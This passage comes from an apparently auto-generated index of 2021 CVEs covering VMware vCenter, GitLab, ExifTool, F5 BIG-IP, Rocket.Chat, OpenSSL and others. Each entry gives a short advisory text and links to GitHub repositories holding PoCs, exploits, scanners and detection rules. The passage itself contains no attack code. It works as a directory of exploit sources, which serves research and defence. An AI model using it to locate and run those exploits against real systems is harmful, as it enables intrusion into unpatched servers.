- [waldo-irc/CVE-2021-21551](https://github.com/waldo-irc/CVE-2021-21551)
- [ch3rn0byl/CVE-2021-21551](https://github.com/ch3rn0byl/CVE-2021-21551)
- [arnaudluti/PS-CVE-2021-21551](https://github.com/arnaudluti/PS-CVE-2021-21551)
- [mathisvickie/CVE-2021-21551](https://github.com/mathisvickie/CVE-2021-21551)
- [mzakocs/CVE-2021-21551-POC](https://github.com/mzakocs/CVE-2021-21551-POC)
- [ihack4falafel/Dell-Driver-EoP-CVE-2021-21551](https://github.com/ihack4falafel/Dell-Driver-EoP-CVE-2021-21551)
- [tijme/kernel-mii](https://github.com/tijme/kernel-mii)
- [nanabingies/CVE-2021-21551](https://github.com/nanabingies/CVE-2021-21551)
- [Eap2468/CVE-2021-21551](https://github.com/Eap2468/CVE-2021-21551)
### CVE-2021-21716
- [MojithaR/CVE-2023-21716-EXPLOIT.py](https://github.com/MojithaR/CVE-2023-21716-EXPLOIT.py)
### CVE-2021-21809 (2021-06-23)
A command execution vulnerability exists in the default legacy spellchecker plugin in Moodle 3.10. A specially crafted series of HTTP requests can lead to command execution. An attacker must have administrator privileges to exploit this vulnerabilities.
- [anldori/CVE-2021-21809](https://github.com/anldori/CVE-2021-21809)
### CVE-2021-21972 (2021-02-24)
The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
- [psc4re/NSE-scripts](https://github.com/psc4re/NSE-scripts)
- [QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC](https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC)
- [NS-Sp4ce/CVE-2021-21972](https://github.com/NS-Sp4ce/CVE-2021-21972)
- [yaunsky/CVE-2021-21972](https://github.com/yaunsky/CVE-2021-21972)
- [horizon3ai/CVE-2021-21972](https://github.com/horizon3ai/CVE-2021-21972)
- [Osyanina/westone-CVE-2021-21972-scanner](https://github.com/Osyanina/westone-CVE-2021-21972-scanner)
- [alt3kx/CVE-2021-21972](https://github.com/alt3kx/CVE-2021-21972)
- [milo2012/CVE-2021-21972](https://github.com/milo2012/CVE-2021-21972)
- [conjojo/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972](https://github.com/conjojo/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972)
- [L-pin/CVE-2021-21972](https://github.com/L-pin/CVE-2021-21972)
- [B1anda0/CVE-2021-21972](https://github.com/B1anda0/CVE-2021-21972)
- [renini/CVE-2021-21972](https://github.com/renini/CVE-2021-21972)
- [stevenp322/cve-2021-21972](https://github.com/stevenp322/cve-2021-21972)
- [GuayoyoCyber/CVE-2021-21972](https://github.com/GuayoyoCyber/CVE-2021-21972)
- [JMousqueton/Detect-CVE-2021-21972](https://github.com/JMousqueton/Detect-CVE-2021-21972)
- [robwillisinfo/VMware_vCenter_CVE-2021-21972](https://github.com/robwillisinfo/VMware_vCenter_CVE-2021-21972)
- [Ma1Dong/vcenter_rce](https://github.com/Ma1Dong/vcenter_rce)
- [d3sh1n/cve-2021-21972](https://github.com/d3sh1n/cve-2021-21972)
- [ByZain/CVE-2021-21972](https://github.com/ByZain/CVE-2021-21972)
- [TaroballzChen/CVE-2021-21972](https://github.com/TaroballzChen/CVE-2021-21972)
- [ZTK-009/CVE-2021-21972](https://github.com/ZTK-009/CVE-2021-21972)
- [murataydemir/CVE-2021-21972](https://github.com/murataydemir/CVE-2021-21972)
- [pettyhacks/vSphereyeeter](https://github.com/pettyhacks/vSphereyeeter)
- [haidv35/CVE-2021-21972](https://github.com/haidv35/CVE-2021-21972)
- [TAI-REx/CVE-2021-21972](https://github.com/TAI-REx/CVE-2021-21972)
- [orangmuda/CVE-2021-21972](https://github.com/orangmuda/CVE-2021-21972)
- [user16-et/cve-2021-21972_PoC](https://github.com/user16-et/cve-2021-21972_PoC)
- [Schira4396/VcenterKiller](https://github.com/Schira4396/VcenterKiller)
### CVE-2021-21973 (2021-02-24)
The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects: VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
- [freakanonymous/CVE-2021-21973-Automateme](https://github.com/freakanonymous/CVE-2021-21973-Automateme)
### CVE-2021-21974 (2021-02-24)
OpenSLP as used in ESXi (7.0 before ESXi70U1c-17325551, 6.7 before ESXi670-202102401-SG, 6.5 before ESXi650-202102101-SG) has a heap-overflow vulnerability. A malicious actor residing within the same network segment as ESXi who has access to port 427 may be able to trigger the heap-overflow issue in OpenSLP service resulting in remote code execution.
- [Shadow0ps/CVE-2021-21974](https://github.com/Shadow0ps/CVE-2021-21974)
- [n2x4/Feb2023-CVE-2021-21974-OSINT](https://github.com/n2x4/Feb2023-CVE-2021-21974-OSINT)
- [CYBERTHREATANALYSIS/ESXi-Ransomware-Scanner-mi](https://github.com/CYBERTHREATANALYSIS/ESXi-Ransomware-Scanner-mi)
- [hateme021202/cve-2021-21974](https://github.com/hateme021202/cve-2021-21974)
### CVE-2021-21975 (2021-03-31)
Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.
- [Henry4E36/VMWare-vRealize-SSRF](https://github.com/Henry4E36/VMWare-vRealize-SSRF)
- [dorkerdevil/CVE-2021-21975](https://github.com/dorkerdevil/CVE-2021-21975)
- [Al1ex/CVE-2021-21975](https://github.com/Al1ex/CVE-2021-21975)
- [TheTh1nk3r/exp_hub](https://github.com/TheTh1nk3r/exp_hub)
- [GuayoyoCyber/CVE-2021-21975](https://github.com/GuayoyoCyber/CVE-2021-21975)
- [murataydemir/CVE-2021-21975](https://github.com/murataydemir/CVE-2021-21975)
- [rabidwh0re/REALITY_SMASHER](https://github.com/rabidwh0re/REALITY_SMASHER)
- [Vulnmachines/VMWare-CVE-2021-21975](https://github.com/Vulnmachines/VMWare-CVE-2021-21975)
### CVE-2021-21978 (2021-03-03)
VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application. An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container.
- [GreyOrder/CVE-2021-21978](https://github.com/GreyOrder/CVE-2021-21978)
- [me1ons/CVE-2021-21978](https://github.com/me1ons/CVE-2021-21978)
- [skytina/CVE-2021-21978](https://github.com/skytina/CVE-2021-21978)
### CVE-2021-21980 (2021-11-24)
The vSphere Web Client (FLEX/Flash) contains an unauthorized arbitrary file read vulnerability. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to gain access to sensitive information.
- [Osyanina/westone-CVE-2021-21980-scanner](https://github.com/Osyanina/westone-CVE-2021-21980-scanner)
- [Osyanina/westone-CVE-2022-1388-scanner](https://github.com/Osyanina/westone-CVE-2022-1388-scanner)
### CVE-2021-21983 (2021-03-31)
Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) prior to 8.4 may allow an authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.
- [murataydemir/CVE-2021-21983](https://github.com/murataydemir/CVE-2021-21983)
### CVE-2021-21985 (2021-05-26)
The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
- [bigbroke/CVE-2021-21985](https://github.com/bigbroke/CVE-2021-21985)
- [alt3kx/CVE-2021-21985_PoC](https://github.com/alt3kx/CVE-2021-21985_PoC)
- [onSec-fr/CVE-2021-21985-Checker](https://github.com/onSec-fr/CVE-2021-21985-Checker)
- [mauricelambert/CVE-2021-21985](https://github.com/mauricelambert/CVE-2021-21985)
- [xnianq/cve-2021-21985_exp](https://github.com/xnianq/cve-2021-21985_exp)
- [daedalus/CVE-2021-21985](https://github.com/daedalus/CVE-2021-21985)
- [testanull/Project_CVE-2021-21985_PoC](https://github.com/testanull/Project_CVE-2021-21985_PoC)
- [haidv35/CVE-2021-21985](https://github.com/haidv35/CVE-2021-21985)
- [aristosMiliaressis/CVE-2021-21985](https://github.com/aristosMiliaressis/CVE-2021-21985)
- [sknux/CVE-2021-21985_PoC](https://github.com/sknux/CVE-2021-21985_PoC)
### CVE-2021-22005 (2021-09-23)
The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.
- [1ZRR4H/CVE-2021-22005](https://github.com/1ZRR4H/CVE-2021-22005)
- [pisut4152/Sigma-Rule-for-CVE-2021-22005-scanning-activity](https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-22005-scanning-activity)
- [Jeromeyoung/VMWare-CVE-Check](https://github.com/Jeromeyoung/VMWare-CVE-Check)
- [5gstudent/CVE-2021-22005-](https://github.com/5gstudent/CVE-2021-22005-)
- [RedTeamExp/CVE-2021-22005_PoC](https://github.com/RedTeamExp/CVE-2021-22005_PoC)
- [rwincey/CVE-2021-22005](https://github.com/rwincey/CVE-2021-22005)
- [TaroballzChen/CVE-2021-22005-metasploit](https://github.com/TaroballzChen/CVE-2021-22005-metasploit)
- [tiagob0b/CVE-2021-22005](https://github.com/tiagob0b/CVE-2021-22005)
- [Jun-5heng/CVE-2021-22005](https://github.com/Jun-5heng/CVE-2021-22005)
- [shmilylty/cve-2021-22005-exp](https://github.com/shmilylty/cve-2021-22005-exp)
- [InventorMAO/cve-2021-22005](https://github.com/InventorMAO/cve-2021-22005)
### CVE-2021-22006 (2021-09-23)
The vCenter Server contains a reverse proxy bypass vulnerability due to the way the endpoints handle the URI. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to access restricted endpoints.
- [CrackerCat/CVE-2021-22006](https://github.com/CrackerCat/CVE-2021-22006)
### CVE-2021-22015 (2021-09-23)
The vCenter Server contains multiple local privilege escalation vulnerabilities due to improper permissions of files and directories. An authenticated local user with non-administrative privilege may exploit these issues to elevate their privileges to root on vCenter Server Appliance.
- [PenteraIO/vScalation-CVE-2021-22015](https://github.com/PenteraIO/vScalation-CVE-2021-22015)
### CVE-2021-22053 (2021-11-19)
Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
- [SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053](https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053)
- [Vulnmachines/CVE-2021-22053](https://github.com/Vulnmachines/CVE-2021-22053)
### CVE-2021-22054 (2021-12-17)
VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain an SSRF vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.
- [MKSx/CVE-2021-22054](https://github.com/MKSx/CVE-2021-22054)
### CVE-2021-22119 (2021-06-29)
Spring Security versions 5.5.x prior to 5.5.1, 5.4.x prior to 5.4.7, 5.3.x prior to 5.3.10 and 5.2.x prior to 5.2.11 are susceptible to a Denial-of-Service (DoS) attack via the initiation of the Authorization Request in an OAuth 2.0 Client Web and WebFlux application. A malicious user or attacker can send multiple requests initiating the Authorization Request for the Authorization Code Grant, which has the potential of exhausting system resources using a single session or multiple sessions.
- [mari6274/oauth-client-exploit](https://github.com/mari6274/oauth-client-exploit)
### CVE-2021-22123 (2021-06-01)
An OS command injection vulnerability in FortiWeb's management interface 6.3.7 and below, 6.2.3 and below, 6.1.x, 6.0.x, 5.9.x may allow a remote authenticated attacker to execute arbitrary commands on the system via the SAML server configuration page.
- [murataydemir/CVE-2021-22123](https://github.com/murataydemir/CVE-2021-22123)
### CVE-2021-22145 (2021-07-21)
A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.
- [niceeeeeeee/CVE-2021-22145-poc](https://github.com/niceeeeeeee/CVE-2021-22145-poc)
### CVE-2021-22146 (2021-07-21)
All versions of Elastic Cloud Enterprise has the Elasticsearch “anonymous” user enabled by default in deployed clusters. While in the default setting the anonymous user has no permissions and is unable to successfully query any Elasticsearch APIs, an attacker could leverage the anonymous user to gain insight into certain details of a deployed cluster.
- [magichk/cve-2021-22146](https://github.com/magichk/cve-2021-22146)
### CVE-2021-22192 (2021-03-24)
An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.2 allowing unauthorized authenticated users to execute arbitrary code on the server.
- [EXP-Docs/CVE-2021-22192](https://github.com/EXP-Docs/CVE-2021-22192)
- [PetrusViet/Gitlab-RCE](https://github.com/PetrusViet/Gitlab-RCE)
### CVE-2021-22201 (2021-04-02)
An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.9. A specially crafted import file could read files on the server.
- [exp1orer/CVE-2021-22201](https://github.com/exp1orer/CVE-2021-22201)
### CVE-2021-22204 (2021-04-23)
Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image
- [convisolabs/CVE-2021-22204-exiftool](https://github.com/convisolabs/CVE-2021-22204-exiftool)
- [se162xg/CVE-2021-22204](https://github.com/se162xg/CVE-2021-22204)
- [bilkoh/POC-CVE-2021-22204](https://github.com/bilkoh/POC-CVE-2021-22204)
- [PenTestical/CVE-2021-22204](https://github.com/PenTestical/CVE-2021-22204)
- [AssassinUKG/CVE-2021-22204](https://github.com/AssassinUKG/CVE-2021-22204)
- [ph-arm/CVE-2021-22204-Gitlab](https://github.com/ph-arm/CVE-2021-22204-Gitlab)
- [Asaad27/CVE-2021-22204-RSE](https://github.com/Asaad27/CVE-2021-22204-RSE)
- [trganda/CVE-2021-22204](https://github.com/trganda/CVE-2021-22204)
- [0xBruno/CVE-2021-22204](https://github.com/0xBruno/CVE-2021-22204)
- [mr-tuhin/CVE-2021-22204-exiftool](https://github.com/mr-tuhin/CVE-2021-22204-exiftool)
- [UNICORDev/exploit-CVE-2021-22204](https://github.com/UNICORDev/exploit-CVE-2021-22204)
- [Akash7350/CVE-2021-22204](https://github.com/Akash7350/CVE-2021-22204)
- [battleofthebots/dejavu](https://github.com/battleofthebots/dejavu)
- [cc3305/CVE-2021-22204](https://github.com/cc3305/CVE-2021-22204)
### CVE-2021-22205 (2021-04-23)
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
- [mr-r3bot/Gitlab-CVE-2021-22205](https://github.com/mr-r3bot/Gitlab-CVE-2021-22205)
- [XTeam-Wing/CVE-2021-22205](https://github.com/XTeam-Wing/CVE-2021-22205)
- [r0eXpeR/CVE-2021-22205](https://github.com/r0eXpeR/CVE-2021-22205)
- [ZZ-SOCMAP/CVE-2021-22205](https://github.com/ZZ-SOCMAP/CVE-2021-22205)
- [Al1ex/CVE-2021-22205](https://github.com/Al1ex/CVE-2021-22205)
- [whwlsfb/CVE-2021-22205](https://github.com/whwlsfb/CVE-2021-22205)
- [findneo/GitLab-preauth-RCE_CVE-2021-22205](https://github.com/findneo/GitLab-preauth-RCE_CVE-2021-22205)
- [Seals6/CVE-2021-22205](https://github.com/Seals6/CVE-2021-22205)
- [c0okB/CVE-2021-22205](https://github.com/c0okB/CVE-2021-22205)
- [shang159/CVE-2021-22205-getshell](https://github.com/shang159/CVE-2021-22205-getshell)
- [devdanqtuan/CVE-2021-22205](https://github.com/devdanqtuan/CVE-2021-22205)
- [hh-hunter/cve-2021-22205](https://github.com/hh-hunter/cve-2021-22205)
- [runsel/GitLab-CVE-2021-22205-](https://github.com/runsel/GitLab-CVE-2021-22205-)
- [faisalfs10x/GitLab-CVE-2021-22205-scanner](https://github.com/faisalfs10x/GitLab-CVE-2021-22205-scanner)
- [inspiringz/CVE-2021-22205](https://github.com/inspiringz/CVE-2021-22205)
- [pizza-power/Golang-CVE-2021-22205-POC](https://github.com/pizza-power/Golang-CVE-2021-22205-POC)
- [DIVD-NL/GitLab-cve-2021-22205-nse](https://github.com/DIVD-NL/GitLab-cve-2021-22205-nse)
- [w0x68y/Gitlab-CVE-2021-22205](https://github.com/w0x68y/Gitlab-CVE-2021-22205)
- [al4xs/CVE-2021-22205-gitlab](https://github.com/al4xs/CVE-2021-22205-gitlab)
- [honypot/CVE-2021-22205](https://github.com/honypot/CVE-2021-22205)
- [momika233/cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-](https://github.com/momika233/cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-)
- [keven1z/CVE-2021-22205](https://github.com/keven1z/CVE-2021-22205)
- [hhhotdrink/CVE-2021-22205](https://github.com/hhhotdrink/CVE-2021-22205)
- [sei-fish/CVE-2021-22205](https://github.com/sei-fish/CVE-2021-22205)
- [overgrowncarrot1/DejaVu-CVE-2021-22205](https://github.com/overgrowncarrot1/DejaVu-CVE-2021-22205)
- [Hikikan/CVE-2021-22205](https://github.com/Hikikan/CVE-2021-22205)
- [NukingDragons/gitlab-cve-2021-22205](https://github.com/NukingDragons/gitlab-cve-2021-22205)
- [cc3305/CVE-2021-22205](https://github.com/cc3305/CVE-2021-22205)
### CVE-2021-22206 (2021-05-06)
An issue has been discovered in GitLab affecting all versions starting from 11.6. Pull mirror credentials are exposed that allows other maintainers to be able to view the credentials in plain-text,
- [dannymas/CVE-2021-22206](https://github.com/dannymas/CVE-2021-22206)
### CVE-2021-22214 (2021-06-08)
When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited
- [aaminin/CVE-2021-22214](https://github.com/aaminin/CVE-2021-22214)
- [Vulnmachines/gitlab-cve-2021-22214](https://github.com/Vulnmachines/gitlab-cve-2021-22214)
- [ZZ-SOCMAP/CVE-2021-22214](https://github.com/ZZ-SOCMAP/CVE-2021-22214)
### CVE-2021-22555 (2021-07-07)
A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was discovered in net/netfilter/x_tables.c. This allows an attacker to gain privileges or cause a DoS (via heap memory corruption) through user name space
- [JoneyJunior/cve-2021-22555](https://github.com/JoneyJunior/cve-2021-22555)
- [xyjl-ly/CVE-2021-22555-Exploit](https://github.com/xyjl-ly/CVE-2021-22555-Exploit)
- [cgwalters/container-cve-2021-22555](https://github.com/cgwalters/container-cve-2021-22555)
- [daletoniris/CVE-2021-22555-esc-priv](https://github.com/daletoniris/CVE-2021-22555-esc-priv)
- [veritas501/CVE-2021-22555-PipeVersion](https://github.com/veritas501/CVE-2021-22555-PipeVersion)
- [masjohncook/netsec-project](https://github.com/masjohncook/netsec-project)
- [tukru/CVE-2021-22555](https://github.com/tukru/CVE-2021-22555)
- [pashayogi/CVE-2021-22555](https://github.com/pashayogi/CVE-2021-22555)
- [letsr00t/-2021-LOCALROOT-CVE-2021-22555](https://github.com/letsr00t/-2021-LOCALROOT-CVE-2021-22555)
- [letsr00t/CVE-2021-22555](https://github.com/letsr00t/CVE-2021-22555)
### CVE-2021-22569 (2022-01-07)
An issue in protobuf-java allowed the interleaving of com.google.protobuf.UnknownFieldSet fields in such a way that would be processed out of order. A small malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated pauses. We recommend upgrading libraries beyond the vulnerable versions.
- [Mario-Kart-Felix/A-potential-Denial-of-Service-issue-in-protobuf-java](https://github.com/Mario-Kart-Felix/A-potential-Denial-of-Service-issue-in-protobuf-java)
### CVE-2021-22873 (2021-01-21)
Revive Adserver before 5.1.0 is vulnerable to open redirects via the `dest`, `oadest`, and/or `ct0` parameters of the lg.php and ck.php delivery scripts. Such open redirects had previously been available by design to allow third party ad servers to track such metrics when delivering ads. However, third party click tracking via redirects is not a viable option anymore, leading to such open redirect functionality being removed and reclassified as a vulnerability.
- [K3ysTr0K3R/CVE-2021-22873-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-22873-EXPLOIT)
### CVE-2021-22880 (2021-02-11)
The PostgreSQL adapter in Active Record before 6.1.2.1, 6.0.3.5, 5.2.4.5 suffers from a regular expression denial of service (REDoS) vulnerability. Carefully crafted input can cause the input validation in the `money` type of the PostgreSQL adapter in Active Record to spend too much time in a regular expression, resulting in the potential for a DoS attack. This only impacts Rails applications that are using PostgreSQL along with money type columns that take user input.
- [halkichi0308/CVE-2021-22880](https://github.com/halkichi0308/CVE-2021-22880)
### CVE-2021-22893 (2021-04-23)
Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild.
- [ZephrFish/CVE-2021-22893_HoneyPoC2](https://github.com/ZephrFish/CVE-2021-22893_HoneyPoC2)
- [Mad-robot/CVE-2021-22893](https://github.com/Mad-robot/CVE-2021-22893)
- [orangmuda/CVE-2021-22893](https://github.com/orangmuda/CVE-2021-22893)
### CVE-2021-22911 (2021-05-27)
A improper input sanitization vulnerability exists in Rocket.Chat server 3.11, 3.12 & 3.13 that could lead to unauthenticated NoSQL injection, resulting potentially in RCE.
- [CsEnox/CVE-2021-22911](https://github.com/CsEnox/CVE-2021-22911)
- [optionalCTF/Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911](https://github.com/optionalCTF/Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911)
- [jayngng/CVE-2021-22911](https://github.com/jayngng/CVE-2021-22911)
- [ChrisPritchard/CVE-2021-22911-rust](https://github.com/ChrisPritchard/CVE-2021-22911-rust)
- [MrDottt/CVE-2021-22911](https://github.com/MrDottt/CVE-2021-22911)
- [overgrowncarrot1/CVE-2021-22911](https://github.com/overgrowncarrot1/CVE-2021-22911)
- [Weisant/CVE-2021-22911-EXP](https://github.com/Weisant/CVE-2021-22911-EXP)
### CVE-2021-22924 (2021-08-05)
libcurl keeps previously used connections in a connection pool for subsequenttransfers to reuse, if one of them matches the setup.Due to errors in the logic, the config matching function did not take 'issuercert' into account and it compared the involved paths *case insensitively*,which could lead to libcurl reusing wrong connections.File paths are, or can be, case sensitive on many systems but not all, and caneven vary depending on used file systems.The comparison also didn't include the 'issuer cert' which a transfer can setto qualify how to verify the server certificate.
- [Trinadh465/external_curl_AOSP10_r33_CVE-2021-22924](https://github.com/Trinadh465/external_curl_AOSP10_r33_CVE-2021-22924)
### CVE-2021-22941 (2021-09-23)
Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the storage zones controller.
- [hoavt184/CVE-2021-22941](https://github.com/hoavt184/CVE-2021-22941)
### CVE-2021-22986 (2021-03-31)
On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.
- [dorkerdevil/CVE-2021-22986-Poc](https://github.com/dorkerdevil/CVE-2021-22986-Poc)
- [S1xHcL/f5_rce_poc](https://github.com/S1xHcL/f5_rce_poc)
- [Osyanina/westone-CVE-2021-22986-scanner](https://github.com/Osyanina/westone-CVE-2021-22986-scanner)
- [safesword/F5_RCE](https://github.com/safesword/F5_RCE)
- [microvorld/CVE-2021-22986](https://github.com/microvorld/CVE-2021-22986)
- [Al1ex/CVE-2021-22986](https://github.com/Al1ex/CVE-2021-22986)
- [kiri-48/CVE-2021-22986](https://github.com/kiri-48/CVE-2021-22986)
- [ZephrFish/CVE-2021-22986_Check](https://github.com/ZephrFish/CVE-2021-22986_Check)
- [yaunsky/CVE-202122986-EXP](https://github.com/yaunsky/CVE-202122986-EXP)
- [Tas9er/CVE-2021-22986](https://github.com/Tas9er/CVE-2021-22986)
- [dotslashed/CVE-2021-22986](https://github.com/dotslashed/CVE-2021-22986)
- [DDestinys/CVE-2021-22986](https://github.com/DDestinys/CVE-2021-22986)
- [west9b/F5-BIG-IP-POC](https://github.com/west9b/F5-BIG-IP-POC)
- [amitlttwo/CVE-2021-22986](https://github.com/amitlttwo/CVE-2021-22986)
- [huydung26/CVE-2021-22986](https://github.com/huydung26/CVE-2021-22986)
### CVE-2021-23017 (2021-06-01)
A security issue in nginx resolver was identified, which might allow an attacker who is able to forge UDP packets from the DNS server to cause 1-byte memory overwrite, resulting in worker process crash or potential other impact.
- [niandy/nginx-patch](https://github.com/niandy/nginx-patch)
- [M507/CVE-2021-23017-PoC](https://github.com/M507/CVE-2021-23017-PoC)
- [lakshit1212/CVE-2021-23017-PoC](https://github.com/lakshit1212/CVE-2021-23017-PoC)
- [ShivamDey/CVE-2021-23017](https://github.com/ShivamDey/CVE-2021-23017)
### CVE-2021-23132 (2021-03-04)
An issue was discovered in Joomla! 3.0.0 through 3.9.24. com_media allowed paths that are not intended for image uploads
- [HoangKien1020/CVE-2021-23132](https://github.com/HoangKien1020/CVE-2021-23132)
### CVE-2021-23358 (2021-03-29)
The package underscore from 1.13.0-0 and before 1.13.0-2, from 1.3.2 and before 1.12.1 are vulnerable to Arbitrary Code Injection via the template function, particularly when a variable property is passed as an argument as it is not sanitized.
- [EkamSinghWalia/Detection-script-for-cve-2021-23358](https://github.com/EkamSinghWalia/Detection-script-for-cve-2021-23358)
- [MehdiBoukhobza/SandBox_CVE-2021-23358](https://github.com/MehdiBoukhobza/SandBox_CVE-2021-23358)
### CVE-2021-23369 (2021-04-12)
The package handlebars before 4.7.7 are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.
- [fazilbaig1/CVE-2021-23369](https://github.com/fazilbaig1/CVE-2021-23369)
### CVE-2021-23383 (2021-05-04)
The package handlebars before 4.7.7 are vulnerable to Prototype Pollution when selecting certain compiling options to compile templates coming from an untrusted source.
- [dn9uy3n/Check-CVE-2021-23383](https://github.com/dn9uy3n/Check-CVE-2021-23383)
- [fazilbaig1/CVE-2021-23383](https://github.com/fazilbaig1/CVE-2021-23383)
### CVE-2021-23410
- [azu/msgpack-CVE-2021-23410-test](https://github.com/azu/msgpack-CVE-2021-23410-test)
### CVE-2021-23639 (2021-12-10)
The package md-to-pdf before 5.0.0 are vulnerable to Remote Code Execution (RCE) due to utilizing the library gray-matter to parse front matter content, without disabling the JS engine.
- [MohandAcherir/CVE-2021-23639](https://github.com/MohandAcherir/CVE-2021-23639)
### CVE-2021-23758 (2021-12-03)
All versions of package ajaxpro.2 are vulnerable to Deserialization of Untrusted Data due to the possibility of deserialization of arbitrary .NET classes, which can be abused to gain remote code execution.
- [numanturle/CVE-2021-23758-POC](https://github.com/numanturle/CVE-2021-23758-POC)
### CVE-2021-23840 (2021-02-16)
Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).
- [Trinadh465/openssl-1.1.1g_CVE-2021-23840](https://github.com/Trinadh465/openssl-1.1.1g_CVE-2021-23840)
### CVE-2021-23841 (2021-02-16)
The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).
